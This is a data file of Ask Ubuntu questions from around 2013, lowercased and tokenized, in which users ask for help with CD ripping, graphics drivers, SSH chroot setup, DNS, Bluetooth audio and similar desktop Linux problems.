370158	trouble playing and ripping cd audio files on linux ubuntu 12.04 lts 32-bit	i 'm trying to rip audio files from a cd onto a subdirectory of the music directory . my linux 12.04 lts 32-bit came with audacity , brasero , banshee , and rhythmbox . ( yes , not one , four players . go figure . ) i tried playing the audio files with audacity , banshee , and rhythmbox , but they all would freeze , so i would have to force-quit them . i was thinking about copy-and-paste , but i noticed that the icons of those files have a lock on them . so i tried this : andrey @ owner-vpcsc1afm : ~/.gvfs/cdda mount on sr0 $ sudo cp ./* ~/music/scott\ walker/tilt/ [ sudo ] password for andrey : cp : can not stat `./track 1.wav ' : permission denied cp : can not stat `./track 2.wav ' : permission denied cp : can not stat `./track 3.wav ' : permission denied cp : can not stat `./track 4.wav ' : permission denied cp : can not stat `./track 5.wav ' : permission denied cp : can not stat `./track 6.wav ' : permission denied cp : can not stat `./track 7.wav ' : permission denied cp : can not stat `./track 8.wav ' : permission denied cp : can not stat `./track 9.wav ' : permission denied ... where ~/.gvfs/cdda mount on sr0 is actually the audio disc feature . i checked out the files ' permissions : andrey @ owner-vpcsc1afm : ~/.gvfs/cdda mount on sr0 $ ls -l total 588881 -r -- -- -- -- 1 andrey owner 70223776 dec 31 1969 track 1.wav -r -- -- -- -- 1 andrey owner 63852208 dec 31 1969 track 2.wav -r -- -- -- -- 1 andrey owner 93532096 dec 31 1969 track 3.wav -r -- -- -- -- 1 andrey owner 64468432 dec 31 1969 track 4.wav -r -- -- -- -- 1 andrey owner 55667248 dec 31 1969 track 5.wav -r -- -- -- -- 1 andrey owner 81877936 dec 31 1969 track 6.wav -r -- -- -- -- 1 andrey owner 89611312 dec 31 1969 track 7.wav -r -- -- -- -- 1 andrey owner 55260352 dec 31 1969 track 8.wav -r -- -- -- -- 1 andrey owner 28518112 dec 31 1969 track 9.wav ... and tried to manually change their permissions , and came up with this : andrey @ owner-vpcsc1afm : ~/.gvfs/cdda mount on sr0 $ chmod 500 ./* chmod : changing permissions of `./track 1.wav ' : operation not supported chmod : changing permissions of `./track 2.wav ' : operation not supported chmod : changing permissions of `./track 3.wav ' : operation not supported chmod : changing permissions of `./track 4.wav ' : operation not supported chmod : changing permissions of `./track 5.wav ' : operation not supported chmod : changing permissions of `./track 6.wav ' : operation not supported chmod : changing permissions of `./track 7.wav ' : operation not supported chmod : changing permissions of `./track 8.wav ' : operation not supported chmod : changing permissions of `./track 9.wav ' : operation not supported is it not allowing me to change permissions because i did not do this as a super-user ? so , i tried this : andrey @ owner-vpcsc1afm : ~/.gvfs/cdda mount on sr0 $ sudo chmod 500 ./* [ sudo ] password for andrey : chmod : can not access `./track 1.wav ' : permission denied chmod : can not access `./track 2.wav ' : permission denied chmod : can not access `./track 3.wav ' : permission denied chmod : can not access `./track 4.wav ' : permission denied chmod : can not access `./track 5.wav ' : permission denied chmod : can not access `./track 6.wav ' : permission denied chmod : can not access `./track 7.wav ' : permission denied chmod : can not access `./track 8.wav ' : permission denied chmod : can not access `./track 9.wav ' : permission denied ================================================== =========== alternatively , i could simply install a ripper application , like asunder ( source : http : //ubuntuforums.org/showthread.php ? t=2185451 ) . i 've installed asunder , but for some reason it took a really long time ( about 30 mins ) to rip the whole cd . if you know a better ripper application ( stable , all-audio-formats -friendly ripper application that does not take an eternity to rip a cd ) , please comment . ================================================================ so , as you can see , not only do i have trouble playing and ripping cd audio files , but i also have trouble changing their permissions . any help to redeem this issue would be much appreciated ... before i stupidly install one more extra media player that might make playing the files happen , or an unnecessary ripping program . i did find some similar threads on the forum ( http : //askubuntu.com/search ? q=rip+audio ) , but they had quite different scenarios , not what i was looking for . i 'm definitely using ubuntu . audacity : 2.0.0-1ubuntu0.1 ; banshee : 2.4.1-3ubuntu1~precise2 ; rhythmbox : 2.96-0ubuntu4.3 i dont remember how i installed these .
370159	upgraded to gnome 3.10 , eclipse stopped working ! what do ?	my machine is running ubuntu 13.10 gnome . yesterday i upgraded to gnome 3.10 ( from the included gnome 3.8 ) . now , my copy of eclipse kepler refuses to open ! i see the splash screen , and then it disappears . for a while it was opening a blank eclipse window ( no toolbars , panels , or anything ) , but now it wo n't even do that . any suggestions for recovery ?
370160	how to cut audio file with avconv ?	i have a hard time trying to figure out how to cut a file with avconv . here 's the command i use : avconv -ss 52:13:49 -t 01:13:52 -i rr119accessibility.wav rr119accessibility-2.wav but it does n't work . i get the whole file as a result . well , almost the whole file . somehow the resulting file has duration 1:16:31 instead of 1:17:23 . also i believe i executed this command in every possible way : with -ss and -t after -i , with -t specifying ending point , with mp3 files , with specifying audio codec , with ffmpeg . am i doing it wrong ? upd thanks to bodhi.zazen this works ( i corrected the offset and duration reported by mp3splt-gtk , they were wrong for some reason or other , and the goal was to cut mp3 file ) avconv -i rr119accessibility.mp3 -ss 00:52:08 -t 00:01:08 rr119accessibility-2.mp3 but this does n't : avconv -ss 00:52:08 -t 00:01:08 -i rr119accessibility.mp3 rr119accessibility-2.mp3 the resulting file start at 00:52:08 and goes until the end of the original file . i thought -ss and -t are related to input file if specified before -i . and to output file otherwise . could someone explain this ?
370161	is rotary heart a desktop screenlet ?	i love the rotary heart open screen on touch . i was wondering if i could download it as a screenlet for 12.04 desktop ? where i can get it from ( a web search did not find anything ) ? and how to download it ! : / ( i am new to ubuntu )
370163	geany permission denied	i wanted to run a small test program , but if i execute it the terminal says : ./geany_run_script.sh : 5 : ./geany_run_script.sh : ./main : permission denied -- -- -- -- -- -- -- -- -- ( program exited with code : 126 ) press return to continue
370164	how to make clementine only search for music	it searches for videos which is annoying any way to make it only search for music ?
370173	ubuntu 12.04 ati 6450	right now my video card is n't responding after the ubuntu logo is shown , ( i see a black screen and that 's it ) i have installed ubuntu 12.04 amd64 and if i remove the video card and use the vga from the mobo then i can use it with no problems , other data : 4 gb of ram 1333 500 gb wd amd apu a6 3500 2,1 ghz i forgot a couple of details , everything was working great until last night , when the light went off ( i do n't know if i 'm explaining myself i 'm from argentina and english is n't my first language there was a power cut i meant ) and then when it got back i used my pc until i went to bed ( after upgrading ) and this morning , when i woke up i had this problem for breakfast , i 've been reading a little and i had a similar problem before and fixed it , but it was a system problem , a missing package or something , i do n't remember , but here the only issue is that the video card does n't give me image after the ubuntu logo .
370180	can i install ubuntu 13.10 on a lap with core i3 x 64 , 8gb ram ?	i want to install ubuntu 13.10 on my lap with 8gb ram and intel core i3 , can i ? ?
370181	why it 's happening ?	whenever i try to apt-get install a thing . this outputs : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : openjdk-7-jre : depends : openjdk-7-jre-headless ( = 7u25-2.3.10-1ubuntu0.12.10.2 ) but it is not going to be installed depends : libgif4 ( > = 4.1.4 ) but it is not installable depends : libatk-wrapper-java-jni ( > = 0.30.4-0ubuntu2 ) but it is not installable recommends : libgnome2-0 but it is not installable recommends : libgnomevfs2-0 but it is not installable recommends : libgconf2-4 but it is not installable recommends : ttf-dejavu-extra but it is not installable e : unable to correct problems , you have held broken packages . how can i resolve this ?
370182	no install button in software center	in software center there is no install buttons . and when i tried to install a software through terminal at the end it shows that `` e : enable to locate . this is my 4 times to installing ubuntu but there is the same problem .
370185	issue with /bin/false then /bin/bash	i 'm having some issues with locking users out of ssh command line . here is my command sequence which is the full outcome i want : useradd testing passwd testing # set to 1 ( for example ) mkdir /home/testing usermod testing -d /home/testing vi /etc/ssh/sshd_config # added the following at the bottom match group testing chrootdirectory /home/testing forcecommand internal-sftp allowtcpforwarding no x11forwarding no groupadd testinggroup usermod testing -g testinggroup usermod testing -d /home/testing service ssh restart usermod testing -s /bin/false # to disable their access to command line # at this point , i 've got exactly what i want , a user , with access to ftp locked into their home directory without access to command line . now , i need to get on their user on command line . usermod testing -s /bin/bash # to enable their access to command line # load putty , put in username and password and it just closes ? at the end , i set my user to /bin/false , then back to /bin/bash and when i go to putty and login it just closes ?
370186	thinking of using ubuntu on an old laptop	i am thinking of trying out ubuntu but have old dell inspiron 1501 amd turion 64 x2 1.6ghz 896 of ram but do n't know what one to try . please help ?
370187	two networks with the same essid , how do i blacklist one or force the other ?	i 'm here at starbucks in kingwood , texas at the intersection of kingwood drive , and west lake houston . i 'm in a shopping outlet . in the same shopping center just 150 feet away is an att store . the problem i 'm encountering is both the starbucks , and the att store broadcast as essid attwifi . unfortunately , they both have two different methods of web-authentication/guest login , and even more unfortunately is one of them is quite normally out of range ; i can just barely get the signal . how do i black list an access point ( the one from the att store ) from nm-applet ? or , how do a force an ap ( the one here at starbucks ) in iwconfig that wo n't revert based on essid ?
370189	ubuntu studio 13.10 migrating from ubuntu 13.10	i decided to give ubuntu studio a try and i followed these instructions to install the packages from ubuntu : after a few days i have decided i like ubuntu studio better and i would like to remove the unnecessary ubuntu staff . unfortunately there is not so many ( recent ) info out there about ubuntu studio . i have done apt-get remove ubuntu-desktop thanks to this post , i have removed unity related packages i have found this blog post which state that ubuntu studio uses gnome so anything gnome related should stay ? it seems to me nautilus should stay ? is it safe to remove compiz ? zeitgeist ? anything else ? thanks
370191	overheating problem with dell n5110 ubuntu 13.04	my dell laptop ( n5110 ) gets extremely overheated with ubuntu till the point that it shutdowns by itself although it works perfectly fine with windows . i am using ubuntu 13.04 . i have heard that many dell laptops have this problem with ubuntu . can anyone suggest how this can be fixed or even if a fix is available or not ?
370192	get latest g++ ( 4.7 ) for c++11 ?	netbeans is complaining because i selected c++11 and my g++ version is 4.6 ( 4.7 supports c++11 ) . however , i have tried : sudo apt-get install build-essential but g++ -- version tells me i have version 4.6 . how do i get 4.7 ? ( my gcc version is 4.7 )
370194	the icons on the top right have all vanished	i have looked around this site and have n't found anything exactly like the case i have . the time , internet , sound and all other icons on my top bar have all simply vanished . the issue arose when i booted my laptop with an hdmi cable connected to a secondary screen but after removing the cable and rebooting my laptop the problem still remains . i currently run on ubuntu 13.10
370195	ubuntu is not installed	ubuntu is not installed . i downloaded iso from ubuntu.com , then i created bootable usb by the loader universal-usb-installer-1.9.4.3 , restarted the computer , put the boot from flash drives , and freezes , even on virtualbox , same . and ubuntu 13 and 12 are not set . . i.stack.imgur.com/gfcha.jpg wubi log
370197	stateless layout switching in ubuntu 14.04	i use extensively two keyboard layouts ( latin for english , and cyrillic for ukrainian and russian ) , and it bothers me to experience my mode errors because of the additional bit of ui state : the current layout . i used to eliminate them completely by using stateless layout switching , whereby one has no nextâ layout action ( as such an action is based on the current state , which is easy to forget for the user , and so leads to errors ) , rather only two actions : enable latin layout ; enable cyrillic layout . this was trivially accomplishable in pre-saucy releases . as illustrated on the screenshot above . however , that settings window was destroyed in saucy . how do i get my stateless switching now ?
370204	ubuntu 13.10 working really slow	i just updated ubuntu 13.04 to 13.10 and what i noticed is that graphical environment working really slow . in previous version everything was working fine , but now forexample i ca n't watching movies . there is sound but image is not smooth it seesm it would display every x frame of movie . is there any update or solution to fix this issue ?
370205	ca n't create a project	i installed the ide , following the instructions on your website . than i went on to : http : //developer.ubuntu.com/apps/qml/tutorial/ the tutorial says : in qt creator , press ctrl+n to create a new project . select the projects - > ubuntu - > simple touch ui template and click chooseâś ... but a thing like that does not exist . the dialogue i get looks like this : i have tried to install the ide , with or without the ppa , but i always get the same result . and as it seems , i am not the only one with that problem : the other one is there a working way to install the sdk ? or at least a workaround ? something like installing the the templates separate ?
370207	how to change the keyboard layout of ltsp clients in 13.10	i am trying to change the keyboard layout for ubuntu 13.10 ltsp clients . i edited /var/lib/tftpboot/ltsp/i386/lts.conf ( which was empty after the install ) . what works is de/german , but this is the keyboard setting that the system was installed with : [ default ] xkblayout=de i can also change the file to [ default ] xkblayout=us this changes all clients to an us-keyboard . but how can different clients/users use different layouts or even switch during a session ?
370208	what mount point should i use for data/free space	i am installing ubuntu 12.04 lts on a pc that has 2 hard drives ( 160 gb and 320 gb ) these drives were set up with ubuntu on the 160 and vista on the 320 as dual boot . i am currently re-partitioning the drives to remove vista and the old ubuntu and only have ubuntu 12.04 on the pc . as i set up the 320 hdd to be a single partition with ext4 as it 's file system , i 'm supposed to select a `` mount point '' before proceeding with the install or the partition will be ignored . i 'm not sure which mount point to choose . /usr/local looks good but that 's a wild guess on my part . also when i set up the partitioning for the 160 gb hdd i had approx . 88 gb of free space left . should that also be formatted as ext4 and be given a mount point ? please let me know as i 'm on hold with the install right now thank you
370213	creating a very simple upstart script	so i 've been attempting to create an incredibly simple upstart script . i started with : console output exec /srv/scripts/test.sh but got this error : start : job failed to start so i changed it to : console output script set -x echo `` hello world ! '' end script this seems to run just find and dandy , but i do n't get any output anywhere , and i was told there would be something written to /var/log/upstart/test.log ( my script is test.conf ) . there was nothing written to that log file- in fact , that log file does n't actually exist . what am i doing wrong ? how do i get just a simple script to run ?
370215	evince 3.10 on ubuntu 12.04	i 'm using document viewer ( evince ) 3.4.0 on ubuntu 12.04 , but would like to use version 3.10 , since it has a new feature which is very useful in my work . i 've used the link provided here https : //apps.ubuntu.com/cat/applications/saucy/evince/ but it just shows me that evince is already installed ( the older version ) . can somebody please help me ?
370222	ca n't boot or see windows 7 particition after installing ubuntu	i installed ubuntu earlier today and i ca n't see windows 7 partition in gparted and do n't get an option to boot windows 7 at restart . when i was installing ubuntu , i chose `` something else '' option and partitioned about 100 gbs of `` unallocated space '' . it did not show windows 7 in those partitions at that time or right now . after googling and trying different things i still was not be able to fix anything . i tried running boot repair after booting from live usb , but that did not help . this is the boot repair log file : http : //paste.ubuntu.com/6349990/ can anyone please suggest what to do to recover windows 7 or at least the files ? please help ! thanks in advance : )
370225	what version should i install that will work best with my ati 4670 card ?	i have a dell studio xps 1647 laptop that has a dual-core intel core i5 and an ati radeon 4670 gpu . it originally came with windows 7 home premium installed , but i have since upgraded to windows 8 ( currently running the 8.1 preview ) . for school , i have to have a working distribution of linux on my machine . i tried ubuntu first , at the time the latest version was 11.04 . it ran , but it seemed that the fan was always on , got and stayed hot quickly , drained the battery quickly , and did n't seem to have nearly the performance that i did running windows . this was mostly fixed when i realized i did n't have the ati drivers installed for my gpu . i installed the fglrx drivers and the problem was mostly fixed . that was my first install of linux , by exploring and toying with things i ended up messing up my system and had to reinstall the os . by this time , i had discovered gnome 3 and was using it so i decided to download ubuntu 12.10 gnome remix so i would n't have to install gnome myself after ubuntu . it installed and ran , but however i noticed that i could not get the fglrx drivers for my gpu to install successfully . i then took to the internet and discovered , much to my chagrin , that it will not work because amd is not supporting xserver 1.13 . you can get more information from this bug report . there is a workaround posted which involves downgrading xserver that has worked for some , but has also lead to unstable or crashing systems for others . i learned that there was an open source driver which could be used . recently i tried to install ubuntu gnome 13.04 ( raring ringtail ) and the open source ati driver . it worked , but i 'm afraid it does n't keep the system from getting too hot like the proprietary driver did . my system runs okay for a short time and then gets so hot that performance quickly degrades and after extended use the system will shut down automatically to prevent physical damage . when i have ran the sensors command i have gotten temperatures around 100-110 degrees celsius on the card before the system shuts itself off . i am basically only able to use the system for about 30 minutes or so before it gets too hot . i am wondering if anyone has any advice for me as far as what i should run considering my hardware . should i download and install the old version 11.04 that seemed to work okay before ? should i try the workaround downgrading xserver on the latest version . is the open source driver my best option or should i just look at a different distribution of linux since i ca n't get my hardware to work properly with ubuntu ?
370229	nvidia 8600m gt driver fail ubuntu 13.10	after i setup ubuntu 13.10 i would like to replace the default nouveaou driver to an officival nvidia driver because every effects is more slowly with nouveou . but when i clicked on each nvidia driver version in addictional drivers after the reboot i got black screen . when i press ctrl alt f1 and write startx i got a long error message with this line error : i could not insert ' actually nvidia version ' no such device
370232	the pages that ubuntu-sdk adds to qt-creator ca n't be zoomed	ubuntu-sdk adds 5 buttons to the qt-creator toolbar ( wiki , pastebin , irc , core apps and api ) . the sole function those buttons seem to have is to link to some web pages . those pages can not be zoomed with the ctrl+mouse-wheel . that is very uncomfortable for those of us that do not have a 20/20 vision . how do i change the pages zoom ?
370235	install brother dcp195c , receiving data but nothing happens , why ?	can someone please help me to install brother dcp195c drivers on ubuntu v12 ? using the default driver , the printer says that it is receiving data but nothing happens .
370237	kernel panic - not syncing : vfs : unable to mount root ( 0,0 ) 13.04 to 13.10	i just downloaded ubuntu 13.10 last night and apparently when i rebooted it , it gave me this error `` kernel panic-not syncing : vfs unable to mount root ( 0,0 ) . i spent most of the day researching a fix and have n't found anything that works . does anyone have any suggestions . i do n't want to do a fresh install because i do n't want to lose my data . i 've tried using old kernels from the grub menu but those kernels ca n't seem to remember my password and wo n't allow me to log in . i feel helpless here . thanks , fred
370240	ati radeon hd 6750 ubuntu 13.10	every time i install the proprietary drivers for my video card . i get a black screen with the cursor only after rebooting and logging in . i tried going back to the terminal using ctrl-alt-f1 and restoring old drivers/open source drivers with no luck . i have also tried resetting unity , also unsuccessful . best i 've gotten is been able to see the desktop/wallpaper but i can not see the taskbar and can not do anything else . keyboard responds partially because i can create folders on the desktop in order to access files but i can not summon the terminal using ctrl+alt+t . the only solution is to reinstall ubuntu , however i can not use my video card to do anything . any ideas ?
370242	suddely internet is not accessible	i am going crazy here . one day everything was working fine . i turned pc off and went to sleep . next day turn pc on and can not access internet ( from any browser ) . the situation is : i can not open any webpage from browser ( tried firefox and epiphany ) and can not receive emails in thunderbird . but if i run firefox from console as sudo , i can use it as usual . i can access skype and pretty much any other network stuff ( like installing software with apt-get etc . ) , also if i use astrill vpn software i can access webpages even running without sudo . i have n't install any software or anything like that for several days = i have not a clue what could cause this . just by the way , other win pc in our home has no issue . here is what i have tried to fix this : i have tried to restart my pc , router , modem - multiple times i have tried to change permissions to my firefox profile i have tried to completely re-install firefox and start with blank profile , thus no addons i have tried to change /etc/resolv.conf to an ip of my router ( it was 127.0.1.1 ) i have tried to change my hostname ( from tomino-nb to tominonb ) i think i might try even more stuff . none of it works . can someone please try to help me . thank you update 1 : i have tried this : removing resolv.conf - did n't help also `` ping '' and `` dig '' commands can not resolve host update 2 : i have tried to edit nameservers in resolv.conf but still no effect . i can ping router as well as i can ping outside ip . so definitely just some dns issue . is it possible that something is rewriting path to resolv.conf and using different file ? update 3 : i have just restarted pc and everything works now ... resolv.conf went back to nameserver 127.0.1.1 . i have no clue what happened that it works again ...
370245	transfer file from ubuntu to nokia lumia	i just bought a brand new lumia running windows phone 8 but my current computer runs ubuntu 13.10 . i want to transfer some files ( music and stuff like that ) to my new lumia . i thought it was as easy as grabbing the folder and dropping it in the destination folder on my lumia . but when i go and check the files , they 're not in the phone . how should i do it correctly ?
370247	error while entering api key in ubuntu	hi i have newly installed maas on ubuntu 12.04 while creating profile for web console of maas i get error message as `` mass-cli : command not found '' which should be working as described in below link http : //maas.ubuntu.com/docs/maascli.html # api-key
370248	some problems with the keyboard layout ?	sometimes when i press the keys e , c or d these letters are replaced by others . for example e is replaced with `` 0we '' and c with `` x9a '' . i think that this is a software related issue , because when i started archlinux from a dvd it worked normally and occasionally everything works fine also in ubuntu . but what kind of problem could it be ?
370250	cuda install in ubuntu13.10 ?	the cuda_install_.log show error : unable to build the nvidia kernel module . error : installation has failed . please see the file /var/log/nvidiainstaller.log ' for details . you may find suggestions on fixing installation problems in the readme available on the linux driver download page at www.nvidia.com . the driver installation is unable to locate the kernel source . please make sure that the kernel source packages are installed and set up correctly . and the other .log show ^ /tmp/selfgz3964/nvidia-linux-x86-319.37/kernel/nv-i2c.c : in function ‘nv_i2c_del_adapter’ : /tmp/selfgz3964/nvidia-linux-x86-319.37/kernel/nv-i2c.c:327:14 : error : void value not ignored as it ought to be osstatus = i2c_del_adapter ( pi2cadapter ) ; ^ make [ 3 ] : *** [ /tmp/selfgz3964/nvidia-linux-x86-319.37/kernel/nv-i2c.o ] 错误 1 make [ 2 ] : *** [ _module_/tmp/selfgz3964/nvidia-linux-x86-319.37/kernel ] 错误 2 nvidia : left kbuild . nvidia.ko failed to build ! make [ 1 ] : *** [ module ] 错误 1 make : *** [ module ] 错误 2 - > error . error : unable to build the nvidia kernel module . error : installation has failed . please see the file '/var/log/nvidia-installer.log ' for details . you may find suggestions on fixing installation problems in the readme available on the linux driver download page at www.nvidia.com . how can i resolve ?
370252	probably the dumbest and poitnless question to ask	how can i dual boot this with windows 8 ? i 've tried to burn to a cd , never have a enough memory or the program tells me that the cd is n't writable . so , i want to run from usb . but i never understood how to run the program from the usb , how to download it on to the usb and how to set up the computer to run the usb before the hard drive . i am a beginner trying to learn linux , if any one could help a newbie like me , that would be much appreciated .
370253	why is my computer beeping out of sleep mode	tonight i put my computer in sleep mode like normal , and only after an hour of sleep mode my computer starting beeping ( 1 long beep then 2 short beeps ) in this weird pattern . i run 12.04.3 lts on a lenovo ideapad s10 netbook .
370254	how can i get the a2dp output option and the input working again ?	i have a bluetooth headset which works perfectly on ubuntu 13.04 . now i update to 13.10 , and here is what 's happing : after installing blueman , bluetooth-suport , pulseaudio-module-bluetooth and so on , i can find my device , pair it and connect to the headset service . but the device does not appear on the sound settings , so i just ca n't select it as input/output device . in other words , it 's connected but `` useless '' . so , searching around for solutions , i found a software called stream2ip . with this i can connect the device and it appears on the sound settings , the sound plays on the device as well , but my microphone does not work , even when selected on the settings , also the a2dp option still not working . stream2ip is n't a solution at all , i mean everything was working without it in the previous ubuntu version . maybe i 'm missing something , and i hope someone could give me any hint . how can i get the a2dp output option and the input working again , on the ubuntu 13.10 ? how to make the device to appear on the sound settings without have to use stream2ip ? thanks ! edit 1 what i tried so far : install bazaar fork related below . reinstall pulseaudio reinstall bluez change settings on /etc/bluetooth/audio.conf ( enable=socket , disable=socket ... ) install all sort of packages like bluez-utils , bluez-audio , gstreamer0.10 install pulseaudio volume control install blueman , bluetooth-suport , pulseaudio-module-bluetooth edit 2 now the microphone and a2dp are working ( separately of course ) . to do this , i have to connect the headset , start some music , pause it using the playback options of the headset , then change the output mode in the sound settings to a2dp ( sometimes it does not work in the first try ) it 's far from working like it was working on 13.04 . but it 's working , and i probably will have to deal with the stream2ip for while . by the way , here is how i installed the strem2ip : sudo apt-add-repository ppa : takkat-nebuk/takkat sudo apt-get update sudo apt-get upgrade sudo apt-get install stream2ip-gtk3 edit 3 instead of using the stream2ip to make the headset appear on the sound settings , you can just use this command : pulseaudio -k now the question is : how to make it automatically when i pair my device ? what i got so far : all the headset stuff working . a way to avoid using the stream2ip , but not the optimal way yet . edit 4 when i disconnect my bluetooth device , the overall sound just crash , all the devices disappear from the sound settings ( including the speakers ) . if open , the rhythmbox also crashes and i do n't have any other system sound as well . any guess on how to solve this ? and i 'm still looking for ways to avoid using the pulseaudio -k command every time i connect my headset .
370255	up , down , right arrow keys and delete key not working	i have already read delete and arrow keys not working and tried what is written there . i have also tried restarting my computer . i have also searched elsewhere for answers , but i have n't found any solution . i am using ubuntu 12.04 , and there were not problems yesterday , but for the last hour , i 've had the following problem . when i press the up or the right arrow , nothing happens . when i press the down arrow , it does n't make anything go down , but something appears in the upper right corner of my screen : when i press the delete key , nothing gets deleted , but something appears in the upper right corner of my screen : the left arrow still works . can anybody help me get my three arrow keys and delete key back ?
370259	i get the following error when i open any progaram in vi please help me	e325 : attention found a swap file by the name `` .ptr.c.swp '' owned by : honey dated : sat oct 26 12:49:38 2013 file name : ~honey/ptr.c modified : yes user name : honey host name : honey-desktop process id : 2542 while opening file `` ptr.c '' dated : sun nov 3 09:05:49 2013 newer than swap file ! ( 1 ) another program may be editing the same file . if this is the case , be careful not to end up with two different instances of the same file when making changes . quit , or continue with caution . ( 2 ) an edit session for this file crashed . if this is the case , use `` : recover '' or `` vim -r ptr.c '' to recover the changes ( see `` : help recovery '' ) . if you did this already , delete the swap file `` .ptr.c.swp '' to avoid this message . `` ptr.c '' 9l , 136c press enter or type command to continue
370260	new installation appears to have got stuck	i 'm installing ubuntu13.1 on new out of box pc that was preinstalled with freedos , and its been on stage nine of the install guide for seven hours now , titled ubuntu one and yet its opened an account for me as it sent me confirming email , thier appears to be no activity as drive light not flashing anymore ( it did for about 30mins ) at start , what should i do ?
370262	i do n't have permission to access other drives	after messing with the user accounts & names , i found i ca n't access my external drives without using sudo . so when i access one normally with cd `` /media/john/freeagent drive '' i receive bash : cd : /media/john/freeagent drive : permission denied however , using sudo : sudo cd /media/john sudo ls -l it gives : drwx -- -- -- 1 john john 20480 sep 24 10:45 freeagent drive/ and id returns uid=1003 ( john ) gid=1003 ( john ) groups=1003 ( john ) , ... so i 'm interpreting this is as `` you are john , only john can access this drive , however , you can not access this drive . '' i have tried sudo chown john : john `` freeagent drive '' and sudo chmod o+rw `` john/freeagent drive '' but i still ca n't access it .
370263	step 2 of windows liveusb instructions are not clear to me	i want to make a bootable usb stick . i run the uui . i see the instructions on official ubuntu site step 1 says : select `` ubuntu desktop edition '' from the dropdown list okay , so the actual title of the drop down box is : select a `` linux distribution '' from the dropdown to put on your usb i am pretty new to computers . 67 years old . live alone . bought my first computer 3 months ago . so i will have to assume that when the instructions say `` ubuntu desktop edition '' , that means the same thing as `` linux distribution '' . okay , no big leap there . so far , so good . so i pick the very first selection : ubuntu 13.10 desktop i386 i 'm not sure why there are so many choices , but i 'm guessing i 'm pretty safe with the first one . it 's for a toshiba satellite laptop 64 bit windows 7 . okay , now for step 2 : the instructions say : click 'browse ' and open the downloaded iso file . the message in the window just before the `` browse '' button says : browse to your ubuntu-13.10*desktop*i386.iso -- > okay , so where 's that file ? so i click `` browse '' and start looking for that file . it is nowhere to be found . so where the is it ?
370265	can not copy mp3 files from a cd	i purchased a set of spoken word audio cd 's that have mp3 and flac audio files ; i think they also play as regular audio cd 's because i see a cda directory and .cda files . but i 'm only interested in playing the mp3 files by copying them to my phone . dolphin file manager shows all the files on the cd . however , it will not copy any of them to my hard drive , which is what my goal is . dolphin shows no error , but the copy progress is zero . amarok will play the files but not easily . i only tried the flac files . to play a file , i click the file in dolphin , then i have to cancel a job using kde 's notification system , then amarok proceeds to copy the file to a tmp directory which takes a long time , then it finally plays . kb3 will rip the audio , but i would prefer to copy the files directly from the cd . since dolphin would not copy the files , i thought i would try the terminal , but i ca n't get that to work either . mount -t auto -o ro /dev/sr0 /mnt/temp that gives the error : wrong fs type , bad option , bad superblock , etc . i get the same error using -t iso9660 and -t udf . so i started troubleshooting : ~ $ wodim -- devices wodim : overview of accessible drives ( 1 found ) : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 0 dev='/dev/sg1 ' rwrw -- : 'matshita ' 'dvd-ram uj8a0as' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - /dev/sg1 is not a block device sudo file -s /dev/sr0 error : can not read /dev/sr0 ( input/output error ) sudo file -s /dev/sg1 just hangs how can i copy these files to my computer hard disk ?
370266	wifi and bluetooth	i'am new to ubuntu and i installed ubnut 13.10 to my toshiba satellite l500d laptop . but wifi and bluetooth are not working . my wireless connectivity light is always on.how to on wifi and connect with the bluetooth . give me a clear answer.in connectivoty tab displays wifi is disabled by the hardware switch
370273	hdmi monitor speakers and ati radeon hd graphics card	i 'm trying the live cd 12.04.3 lts , but ca n't get sound to work from hdmi speakers and amd ati radeon 6000 series graphics cards . i downloaded the linux driver from the amd website , called amd-driver-installer-catalyst-13-4-x86.x86_64.run . i extracted the file , then double-clicked on it . it looks like a script file . how do i install it ? will this solve my sound problem ?
370274	can i purchase the new version disc	was wondering when will 13.00 be available to purchase on a disc from your store , right now the only thing i see to purchase is 12.00
370275	unable to load some programs due to log out why is this ?	i have ubuntu 13.10 , after entering my compiz and unchecking the wrong thing to switch to cube i lost both my side menu and top menu and had to go through terminal to get it back via some commands . i have forgot what exactly but may be able to retrieve if needed . when i had the cube set up the way i liked it i went to open my teamspeak 3 only to find right after it popped up the computer would give me a black screen for 2-5 seconds and bring me to the login screen . so then i tried to run diablo 3 under wine like i normally would and it too would go black and bring me to login ... so then i tried the netflix app i had got installed and it to did the same ? ? ? they all have one thing in common the they are normally only windows supported programs except netflix which is web based , except in linux , but i am not sure why ? i searched all day to no resolve on this issue , keep in mind all these programs worked great before my problem with compiz and so far seem to be the only ones with the problem . i will do some more testing to see if i cant find some more specific thing that helps or hurts , i just hope this has been seen before and some one can help me .
370276	windows becoming unresposive on upgrade to 13.10 from 13.04	i have just upgraded to saucy but am facing several issues . any window that i open is unresponsive or only starts responding after a very long time to mouse clicks . i just can not use my mouse or touchpad at all and am having to navigate entirely with my keyboard . even that stops working occasionally . currently i 'm using the older kernel 3.8 to get around my wifi issues but the issue was present even in the 3.11 kernel . edit : i might add that the issue comes up gradually i.e . after i do a sudo service lightdm restart or right after initial login , the windows seem to work fine but after some time they stop responding completely to mouse events and sometimes to key presses as well . update : after a prolonged run without rebooting , i find that the computer is becoming unresponsive to key presses every 5-6 seconds and then resumes after another 5-6 seconds . also , the screen locking seems to be delayed and happens after i return to work after leaving the machine idle for some time . further , sometimes the title bar of a window does not respond to clicks while the window content does or vice versa ( this is particularly the case with nautilus ) another thing is that while i am using any browser , whether chrome or firefox , the window automatically navigates back periodically i.e . it behaves as if i had pressed the back button when i clearly have not done so . at times this becomes really frequent and annoying . for example , while i was typing this question , i kept getting popups telling me that i am in the middle of an edit and if i really wanted to navigate away from this page . i have tried clearing my browser cache and that has only made it a little less frequent . i do n't know if this is some kind of virus that came free along with the saucy upgrade or some kind of bug or configuration problem in my computer . note that i am not being redirected to a particular site but am just being made to go back in my browser history . having never faced such a problem on ubuntu , i 'm at my wit 's end on what to do about it . any help will be greatly appreciated .
